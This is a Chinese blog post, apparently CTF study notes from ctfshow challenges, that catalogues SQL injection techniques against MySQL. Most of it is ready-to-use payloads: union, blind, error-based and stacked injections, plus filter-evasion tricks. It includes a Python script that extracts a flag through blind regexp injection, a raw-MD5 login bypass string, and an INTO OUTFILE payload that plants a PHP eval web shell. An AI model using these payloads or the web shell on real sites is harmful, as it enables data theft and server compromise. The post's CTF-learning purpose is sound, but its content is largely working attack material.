sql注入总结

最新推荐文章于 2024-08-14 09:19:43 发布
最新推荐文章于 2024-08-14 09:19:43 发布
阅读量258 收藏
点赞数
分类专栏: SQL注入 文章标签: sql mysql 数据库 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45655564/article/details/118609209
版权
本文详细介绍了SQL注入的各种类型及其利用方法,包括字符型注入、数字型注入、联合查询、布尔盲注、时间盲注、报错注入、双查询注入、文件头注入等。同时,展示了如何通过数学式、正则表达式、LIKE和REGEXP操作来规避过滤。此外,还提到了预处理语句、文件导出和读写、利用错误信息等高级技巧。最后,讨论了如何通过位运算和编码转换绕过数字过滤。
摘要由CSDN通过智能技术生成

tips

判断字符型注入还是数字型

在判断数值型和字符型注入时,可以通过提交数学式的方式,例如:id=2/2,字符型返回id=2的内容,数字型则返回id=1的结果。

||在sql的偶用

||表示拼接,如’a’||‘b’ 等价于’ab’
如果有数字,就表示or的作用

联合注入

假设无过滤,这种是最简单的了算是。

-1' union select 1,2,3--+

对返回结果有过滤有时候需要用base64或hex返回

-1' union select to_base64(username),hex(password) from ctfshow_user2 --+

-1' union select to_base64(username),hex(password) from ctfshow_user2 --+

对返回结果的数字进行了过滤

-1union select ‘a’,replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,0,‘numA’),1,‘numB’),2,‘numC’),3,‘numD’),4,‘numE’),5,‘numF’),6,‘numG’),7,‘numH’),8,‘numI’),9,‘numJ’) from ctfshow_user4–+

利用读写文件把结果写入网站目录

1union select 1,password from ctfshow_user5 into outfile/var/www/html/1.txt’–+

布尔盲注&&时间盲注

普通方法

1=if(ascii(substr((select  password from ctfshow_user5 limit 24,1),{i},1))>{mid},sleep(2),0) -- -

regexp

"tableName":f"(ctfshow_user)where(substr(pass,1,2))regexp('ct')&&(substr(pass,{i},1))regexp('{j}')"

right join

RIGHT JOIN 关键字会右表 (table_name2) 那里返回所有的行,即使在左表 (table_name1) 中没有匹配的行

"tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{i},1)regexp(char({j})))"

利用true绕过数字过滤

在这里插入图片描述

import requests

url = "http://71610981-3c01-4b8f-816e-be4d190b34cf.challenge.ctf.show:8080/select-waf.php"

flag = 'flag{'


def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
    return num


for i in range(45):
    if i <= 5:
        continue
    for j in range(127):
        data = {
            "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{createNum(i)},{createNum(1)})regexp(char({createNum(j)})))"
        }
        r = requests.post(url, data=data)
        if r.text.find("$user_count = 43;") > 0:
            if chr(j) != ".":
                flag += chr(j)

                print(flag.lower())
                if chr(j) == "}":
                    exit(0)
                break

MD5($str,true)

username:admin
password:ffifdyop

利用where username=0中的弱类型比较

在where username=0这样的查询中,因为username都会是字符串,在mysql中字符串与数字进行比较的时候,以字母开头的字符串都会转换成数字0,因此这个where可以把所有以字母开头的数据查出来。
而password=0的原因在于这里:
intval让等号右边为数字0

if($row['pass']==intval($password)){

堆叠注入

修改列名

1;alter table ctfshow_user change pass jie varchar(255);alter table ctfshow_user change id pass varchar(255);

预处理

1;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;#

handler

1;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;#

预处理十六进制转换

username=user1’;PREPARE anf from 0x73656c656374202a2066726f6d2063746673685f6f775f666c61676173;EXECUTE anf;

这样有时候会失败,所以最好先把十六进制的字符串预定义

into oufile的扩展利用

SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']//分隔符
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]



“OPTION”参数为可选参数选项,其可能的取值有:

`FIELDS TERMINATED BY '字符串'`:设置字符串为字段之间的分隔符,可以为单个或多个字符。默认值是“\t”。

`FIELDS ENCLOSED BY '字符'`:设置字符来括住字段的值,只能为单个字符。默认情况下不使用任何符号。

`FIELDS OPTIONALLY ENCLOSED BY '字符'`:设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。默认情况下不使用任何符号。

`FIELDS ESCAPED BY '字符'`:设置转义字符,只能为单个字符。默认值为“\”。

`LINES STARTING BY '字符串'`:设置每行数据开头的字符,可以为单个或多个字符。默认情况下不使用任何字符。

`LINES TERMINATED BY '字符串'`:设置每行数据结尾的字符,可以为单个或多个字符。默认值是“\n”。



filename=3.php' LINES STARTING BY '<?php eval($_POST[0]);?>'#

报错注入

?id=' or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),1),1)-- -

?id=' or updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flag'),1),1)-- -

' or updatexml(1,concat(1,substr((select group_concat(flag) from ctfshow_flag),1,32),1),1)-- -

' or updatexml(1,concat(1,substr((select group_concat(flag) from ctfshow_flag),20,32),1),1)-- -

在这里插入图片描述

双查询注入

' union select 1,count(*),concat((select flag2 from ctfshow_flags),0x7e,floor(rand()*2))a from information_schema.columns group by a-- -

无列名注入

select `3` from (select 1,2,3,4,5 union select * from users)a;
//就相当于select pass from (select 1,2,3,4,5 union select * from users)a;

^可以作为连接符使用或代替or

username=aaa&password=aaa'^extractvalue(1,concat('~',right((select(group_concat(password))from(geek.H4rDsq1)),30)))%23

1^(1=1) 错误
0^(1=1) 正确
1^(2>1) 错误
0^(2>1) 正确
0^(ascii(substr((select(flag)from(flag)),1,1))>1)

逗号被过滤

’ and ascii(substr((select database())from 1 for 1))=xx %23这应该是substring函数的两种用法吧,limit则是 LIMIT M OFFSET N

利用with rollup绕过查询密码

sql语句:select id,count() form users group by id with rollup;
在这里插入图片描述
我们看到增加了一列,其中id为NULL,count()为统计和。

ascii过滤,可以用 ord()

REGEXP注入与LIKE注入

mysql的正则不区分大小写,如果要区分的话,要在regexp后加 binary关键字。
REGEXP注入分析
REGEXP注入,即regexp正则表达式注入。REGEXP注入,又叫盲注值正则表达式攻击。
应用场景就是盲注,原理是直接查询自己需要的数据,然后通过正则表达式进行匹配。

select (select语句) regexp '正则'


select (select username from users where id=1) regexp '^a';

在这里插入图片描述
^表示pattern(模式串)的开头。即若匹配到username字段下id=1的数据开头为a,则返回1;否则返回0

regexp关键字还可以代替where条件里的=号
^若被过滤,可使用$来从后往前进行匹配
常用regexp正则语句:

regexp '^[a-z]'  #判断一个表的第一个字符串是否在a-z中
regexp '^r'      #判断第一个字符串是否为r
regexp '^r[a-z]' #判断一个表的第二个字符串是否在a-z中

LIKE注入分析
百分比(%)通配符允许匹配任何字符串的零个或多个字符。下划线_通配符允许匹配任何单个字符。

like 's%'判断第一个字符是否为s
like 'se%'判断前面两个字符串是否为se
like '%sq%' 判断是否包含se两个字符串
like '_____'判断是否为5个字符
like 's____' 判断第一个字符是否为s

文件头注入

https://www.cnblogs.com/conquer-vv/p/11328249.html

Anfy1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022年终考核
m0_56750177的博客
12-01 509
web安全实习生年终考核
SQL注入总结
ad12456的博客
03-27 1954
SQL注入
记录从零开始学习单片机之路6------矩阵键盘密码
qq_43785130的博客
04-26 60
2023年04月26日 14:54:10。
sql注入出现两个password的原因分析
Pz_mstr's Blog
08-23 548
近期一直在学习sql注入,在起初使用dvwa进行练习时,爆破出来的表就有如下特点 可以看到,爆出来的列名有一个user_id,一个id,一个user,一个username,两个password, 一开始我尝试使用username进行继续dump却发现不存在该列,在起初不知道原因所在,现在一想,原来是出在了select查询语句的问题上: 只限定了table_name='users',因此会
SQLmap注入漏洞
qq_39122260的博客
02-16 2033
sql注入概述 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺 骗服务器执行恶意的SQL命令。它是利用现有应用程序,可以通过在Web表单中输入(恶意)SQL 语句得到一个存在安全漏洞的网站上的数据库。比如先前的很多影视网站泄露VIP会员密码大多就是 通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击 什么是SQLmap SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性, 即对检测与利用的自动化处理(数据库指纹、访问底层文件
菜鸟的mysql踩坑之路
weixin_45638402的博客
09-12 331
笔者以前一直使用的oracle,现在换了新公司,使用的是mysql,刚开始用的时候真的各种不习惯,最近刚好有时间,整理一下最近使用mysql遇到的一些问题。 1.MySQL中NULL和空字符串的区别以及注意点: 有一次行转列的时候,我想使用ifnull()函数把空字段全部转换成’null’字符串方便我做处理,结果发现只有部分空字段变成了null字符串,我百思不得其解,仔细看了一下数据发现表中有些空...
SQL注入基础总结
IerkeU的博客
12-09 4216
一、什么是SQL注入? 答:SQL注入是比较常见的网络攻击方式之一,它不是利用OS的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句实现无账号登陆,甚至篡改数据库。 二、SQL注入的原理? 答:SQL注入攻击通过构建特殊的输入语句作为参数传入web应用程序,指的是服务器对用户输入数据过滤不严,导致服务器SQL语句被恶意篡改并成功 SQL注入的危害? 当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句。 SQL注入带来的危害主要有如
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
SQL注入的2个小Trick及示例总结
09-09
SQL注入是一种常见的网络安全威胁,它发生在应用程序接收用户输入并直接构造SQL查询时,如果没有进行适当的参数化或转义,攻击者可以通过输入恶意SQL代码来控制或操纵数据库。本文将详细介绍两个关于SQL注入的小技巧...
sql注入语句万能密码_sql注入——万能密码
weixin_40001025的博客
12-06 5910
通过两个ctf题来做讲解,第一个很简单,第二个多了些限制http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.phphttp://ctf5.shiyanbar.com/web/wonderkun/web/index.html 万能密码原理万能密码漏洞都是因为提交字符未加过滤或过滤不严而导致的。$sql =...
password(用户输入)
dijiao1831的博客
10-12 480
示例: importgetpass #密文处理getpass.getpass _username='Future星空' _password='haha' username=input("username:") password=input("password:")if_username==usernameand_password==pass...
SQL注入
qq_39480875的博客
05-22 241
转自:https://wywwzjj.top/2018/11/02/Sqli-labs-通关记录/#函数报错信息注入 MySQL 常用语句备忘 -- Default Databases mysql Requires root privileges information_schema Available from version 5 and higher Comment Out Que...
mysql+limit+sql注入_SQL注入Bypass
weixin_39977136的博客
02-18 1539
前言:Android App安全测试先告一段落,虽然感觉还有很多需要学习的地方,毕竟我主要还是对Web方向感兴趣,又回到最初的起点!空格绕过:每种类型的数据库都允许使用空白字符。每个不同的RDBMS允许各种不同的空白字符,而不是通常的0x20。通过使用其他允许的空格字符切换标准空格,我们可以使某些防火墙无法识别注入,从而使我们能够有效地绕过它们1、/**/、/*!*/、%09、%0a、%0b、%0...
Prostgresql的Timescaledb插件/扩展部署
最新发布
weixin_45697805的博客
08-14 114
背景:研发需求,需要把docker部署得postgresql迁移到新的节点并要求再本地部署,提前查看数据库需要那些插件,并进行安装,docker部署的默认有插件。
SQL注入深度解析与防护策略
"SQL注入详解,黑客必学的技能,涉及SQL注入的各个方面,包括背景、原理、分类、渗透测试及具体攻击类型" 在网络安全领域,SQL注入是一种常见且危害极大的攻击方式,它主要针对使用SQL(结构化查询语言)的Web应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值